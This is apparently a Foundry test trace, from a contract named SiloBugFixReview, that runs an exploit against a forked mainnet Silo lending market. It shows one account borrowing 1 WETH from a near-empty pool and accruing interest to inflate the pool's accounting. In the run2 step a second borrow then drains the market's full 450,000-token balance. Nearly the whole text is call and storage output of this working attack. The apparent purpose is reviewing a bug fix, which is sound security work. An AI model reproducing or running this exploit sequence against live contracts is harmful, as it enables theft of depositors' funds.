    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000d4d43fc779954
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xebb842796419b49d0fcc7cc3e1cfa3a00e6d8e3c2f2099d4249f3f97c102679b: 0x0000000000000000000000000000000000000000000000010000000064190d17 → 0x00000000000000000000000000000000000000000000000100000000644ac707
    │   │   │   │   @ 0xf521275bc127671174f9c4bab19091b46c0a61f91ea1d386a327c1b501baa453: 0 → 0x00000000000000000000000000000000000000000000001d8b64f4775be40000
    │   │   │   └─ ← [Return] 545000000000000000000 [5.45e20], 545000000000000000000 [5.45e20]
    │   │   ├─ [291663] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::borrow(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 1000000000000000000 [1e18])
    │   │   │   ├─ [1301] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::isSiloPaused(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [2579] 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2579] 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   │   │   └─ ← [Return] 1000000000000100000 [1e18]
    │   │   │   ├─ [413] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::entryFee() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [2349] 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [47411] 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e::mint(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], 1000000000000000000 [1e18])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], value: 1000000000000000000 [1e18])
    │   │   │   │   ├─ [305] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::siloRepository() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000d998c35b7900b344bbbe6555cc11576942cf309d
    │   │   │   │   ├─ [642] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getNotificationReceiver(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 2: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   │   @ 0x720e1b3d800394033de075a1fff553b62904feb588458fd6c44df09740b51a98: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Borrow(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], param2: 1000000000000000000 [1e18])
    │   │   │   ├─ [25162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], 1000000000000000000 [1e18])
    │   │   │   │   ├─ emit Transfer(from: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, to: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], value: 1000000000000000000 [1e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xcceb29b887411bad822af7c617d87ca00620b0813897c3e3bb802f007e7c5a66: 0x0000000000000000000000000000000000000000000000000de0b6b3a76586a0 → 100000
    │   │   │   │   │   @ 0xbc93b95fb13b8fd819fbf60078dbe0264f9841ed2d94ee86afa3a1c5655d236b: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   │   ├─ [12069] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA, 1682622215 [1.682e9]) [staticcall]
    │   │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000032d6285a98bd5d009ae000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000644ac707
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [579] 0xC81CF1ff5bB586CD54328ae9563572061cA7b481::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   │   ├─ [14074] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 1682622215 [1.682e9]) [staticcall]
    │   │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000186a00000000000000000000000000000000000000000000000000de0b6b3a764000000000000000000000000000000000000000000000000000000000000644ac707
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [579] 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   ├─ [349] 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   ├─ [2872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000064359a0a87b799140ec74c2eb037e27dd4500a15
    │   │   │   ├─ [34707] 0x64359a0A87B799140Ec74C2eb037E27dD4500A15::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc, 1682622215 [1.682e9]) [staticcall]
    │   │   │   │   ├─ [3163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000069e10de76676d0800000000000000000000000000000000000000000000000000a968163f0a57b4000000000000000000000000000000000000000000000000000000000000064190d3b
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000001d60ae70b870b
    │   │   │   ├─ [2579] 0x809a14563A12acb8fc257502813131cA97E6CcF1::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [426] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::priceProvidersRepository() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000007c2ca9d502f2409beceafa68e97a176ff805029f
    │   │   │   ├─ [450] 0x7C2ca9D502f2409BeceAfa68E97a176Ff805029F::getPrice(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   ├─ [444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   │   │   │   └─ ← [Return] 18
    │   │   │   ├─ [2579] 0x26693A8D6f2A95F9DB48a950D5F2d7f9DE320CcD::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [579] 0x4e27963C016573a5571939404217A3241Af00C7A::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 545000000000000000000 [5.45e20]
    │   │   │   ├─ [872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   │   ├─ [12069] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA, 1682622215 [1.682e9]) [staticcall]
    │   │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000032d6285a98bd5d009ae000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000644ac707
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [349] 0x4e27963C016573a5571939404217A3241Af00C7A::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 545000000000000000000 [5.45e20]
    │   │   │   ├─ [579] 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [579] 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2579] 0xb02E552D68Cd538f571f72F630366adb616d9466::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2579] 0x22EE742A6773dF30C91b97c7dab590702046Ae95::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [7882] 0x7C2ca9D502f2409BeceAfa68E97a176Ff805029F::getPrice(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   ├─ [6669] 0xe37B8c83138caF12E57632D19c06Eb561D47e423::getPrice(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   │   ├─ [3143] 0xDC530D9457755926550b59e8ECcdaE7624181557::latestRoundData() [staticcall]
    │   │   │   │   │   │   ├─ [1410] 0xbba12740DE905707251525477bAD74985DeC46D2::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7043, 3744129091082580 [3.744e15], 1682607875 [1.682e9], 1682607875 [1.682e9], 7043
    │   │   │   │   │   │   └─ ← [Return] 73786976294838213507 [7.378e19], 3744129091082580 [3.744e15], 1682607875 [1.682e9], 1682607875 [1.682e9], 73786976294838213507 [7.378e19]
    │   │   │   │   │   ├─ [1140] 0xDC530D9457755926550b59e8ECcdaE7624181557::decimals() [staticcall]
    │   │   │   │   │   │   ├─ [298] 0xbba12740DE905707251525477bAD74985DeC46D2::decimals() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000d4d43fc779954
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000d4d43fc779954
    │   │   │   ├─ [267] 0x514910771AF9Ca656af840dff83E8264EcF986CA::decimals() [staticcall]
    │   │   │   │   └─ ← [Return] 18
    │   │   │   ├─ [2860] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaximumLTV(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000a688906bd8b0000
    │   │   │   ├─ [2860] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaximumLTV(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000b1a2bc2ec500000
    │   │   │   ├─ [2860] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaximumLTV(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000bcbce7f1b150000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x67aa9b7d2b6d14f3837d07b1073399a41e4104b1d98f169f02cc04f44f14f4b5: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   └─ ← [Return] 1000000000000000000 [1e18], 1000000000000000000 [1e18]
    │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1000000000000000000 [1e18])
    │   │   │   ├─ emit Transfer(from: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], to: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1000000000000000000 [1e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   @ 0xbc93b95fb13b8fd819fbf60078dbe0264f9841ed2d94ee86afa3a1c5655d236b: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 2 → 1
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [0] VM::makePersistent(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [0] VM::makePersistent(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C)
    │   └─ ← [Return]
    ├─ [0] VM::makePersistent(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [1825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   └─ ← [Return] AssetStorage({ collateralToken: 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F, collateralOnlyToken: 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a, debtToken: 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e, totalDeposits: 100000 [1e5], collateralOnlyDeposits: 0, totalBorrowAmount: 1000000000000000000 [1e18] })
    ├─ [0] VM::makePersistent(0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F)
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [1825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   └─ ← [Return] AssetStorage({ collateralToken: 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F, collateralOnlyToken: 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a, debtToken: 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e, totalDeposits: 100000 [1e5], collateralOnlyDeposits: 0, totalBorrowAmount: 1000000000000000000 [1e18] })
    ├─ [0] VM::makePersistent(0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a)
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [1825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   └─ ← [Return] AssetStorage({ collateralToken: 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F, collateralOnlyToken: 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a, debtToken: 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e, totalDeposits: 100000 [1e5], collateralOnlyDeposits: 0, totalBorrowAmount: 1000000000000000000 [1e18] })
    ├─ [0] VM::makePersistent(0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e)
    │   └─ ← [Return]
    ├─ [0] VM::makePersistent(0x514910771AF9Ca656af840dff83E8264EcF986CA)
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [1825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   └─ ← [Return] AssetStorage({ collateralToken: 0x26693A8D6f2A95F9DB48a950D5F2d7f9DE320CcD, collateralOnlyToken: 0x4e27963C016573a5571939404217A3241Af00C7A, debtToken: 0xC81CF1ff5bB586CD54328ae9563572061cA7b481, totalDeposits: 15004302198731537648046 [1.5e22], collateralOnlyDeposits: 545000000000000000000 [5.45e20], totalBorrowAmount: 0 })
    ├─ [0] VM::makePersistent(0x26693A8D6f2A95F9DB48a950D5F2d7f9DE320CcD)
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [1825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   └─ ← [Return] AssetStorage({ collateralToken: 0x26693A8D6f2A95F9DB48a950D5F2d7f9DE320CcD, collateralOnlyToken: 0x4e27963C016573a5571939404217A3241Af00C7A, debtToken: 0xC81CF1ff5bB586CD54328ae9563572061cA7b481, totalDeposits: 15004302198731537648046 [1.5e22], collateralOnlyDeposits: 545000000000000000000 [5.45e20], totalBorrowAmount: 0 })
    ├─ [0] VM::makePersistent(0x4e27963C016573a5571939404217A3241Af00C7A)
    │   └─ ← [Return]
    ├─ [547] SiloBugFixReview::SILO() [staticcall]
    │   └─ ← [Return] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C
    ├─ [1825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   └─ ← [Return] AssetStorage({ collateralToken: 0x26693A8D6f2A95F9DB48a950D5F2d7f9DE320CcD, collateralOnlyToken: 0x4e27963C016573a5571939404217A3241Af00C7A, debtToken: 0xC81CF1ff5bB586CD54328ae9563572061cA7b481, totalDeposits: 15004302198731537648046 [1.5e22], collateralOnlyDeposits: 545000000000000000000 [5.45e20], totalBorrowAmount: 0 })
    ├─ [0] VM::makePersistent(0xC81CF1ff5bB586CD54328ae9563572061cA7b481)
    │   └─ ← [Return]
    ├─ [0] VM::rollFork(17139471 [1.713e7])
    │   └─ ← [Return]
    ├─ [0] console::log("time stamp after = ", 1682622239 [1.682e9]) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("block number after = ", 17139471 [1.713e7]) [staticcall]
    │   └─ ← [Stop]
    ├─ [416141] SiloBugFixReview::run2()
    │   ├─ [68207] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::accrueInterest(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   │   ├─ [7301] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::isSiloPaused(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   ├─ [31821] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRateAndUpdate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 1682622239 [1.682e9])
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000186a00000000000000000000000000000000000000000000000000de0b6b3a764000000000000000000000000000000000000000000000000000000000000644ac707
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000de0b6b3a76400000000
    │   │   ├─ [2439] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::protocolShareFee() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   ├─  storage changes:
    │   │   │   @ 0x67aa9b7d2b6d14f3837d07b1073399a41e4104b1d98f169f02cc04f44f14f4b3: 100000 → 0x000000000000000000000000000000000000000000000c7d713b49da000186a0
    │   │   │   @ 0x00137c28eabea4eda5601e544e6551e6761ee561d32c4142c29e0f892835a363: 0x00000000000000000000000000000000000000000000000100000000644ac707 → 0x00000000000000000000000000000000000000000000000100000000644ac71f
    │   │   │   @ 0x67aa9b7d2b6d14f3837d07b1073399a41e4104b1d98f169f02cc04f44f14f4b5: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0x000000000000000000000000000000000000000000000de0c4945e17a7640000
    │   │   │   @ 0x00137c28eabea4eda5601e544e6551e6761ee561d32c4142c29e0f892835a362: 0 → 0x00000000000000000000000000000000000000000000016345785d8a00000000
    │   │   └─ ← [Return] 65536000000000000000000 [6.553e22]
    │   ├─ [2559] 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc::balanceOf(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   └─ ← [Return] 450000000000000000000000 [4.5e23]
    │   ├─ [339408] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::borrow(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc, 450000000000000000000000 [4.5e23])
    │   │   ├─ [3301] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::isSiloPaused(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000064359a0a87b799140ec74c2eb037e27dd4500a15
    │   │   ├─ [52932] 0x64359a0A87B799140Ec74C2eb037E27dD4500A15::getCompoundInterestRateAndUpdate(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc, 1682622239 [1.682e9])
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000069e10de76676d0800000000000000000000000000000000000000000000000000a968163f0a57b4000000000000000000000000000000000000000000000000000000000000064190d3b
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3f8525ac0c417811bc54b8565a131faf12c4772191af079860a73058a0c87107: 0 → 0x00000000000000000000000000000000000000000000000000000000097343df
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000001d60bc9f7e5ee
    │   │   ├─ [439] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::protocolShareFee() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   ├─ [2579] 0xb02E552D68Cd538f571f72F630366adb616d9466::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2579] 0x22EE742A6773dF30C91b97c7dab590702046Ae95::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [559] 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc::balanceOf(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   │   └─ ← [Return] 450000000000000000000000 [4.5e23]
    │   │   ├─ [413] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::entryFee() [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2349] 0x809a14563A12acb8fc257502813131cA97E6CcF1::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 50000000000000000000000 [5e22]
    │   │   ├─ [32311] 0x809a14563A12acb8fc257502813131cA97E6CcF1::mint(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 449767550640560471808134 [4.497e23])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 449767550640560471808134 [4.497e23])
    │   │   │   ├─ [305] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::siloRepository() [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000d998c35b7900b344bbbe6555cc11576942cf309d
    │   │   │   ├─ [2642] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getNotificationReceiver(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x996b860ef646da948c7d745162e3851398cba818db7bc8c7a4d9d465a54dfa11: 0 → 0x000000000000000000000000000000000000000000005f3df2a170fa19141886
    │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000a968163f0a57b400000 → 0x0000000000000000000000000000000000000000000069d47405619f94541886
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Borrow(param0: 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc, param1: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param2: 450000000000000000000000 [4.5e23])
    │   │   ├─ [27762] 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc::transfer(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 450000000000000000000000 [4.5e23])
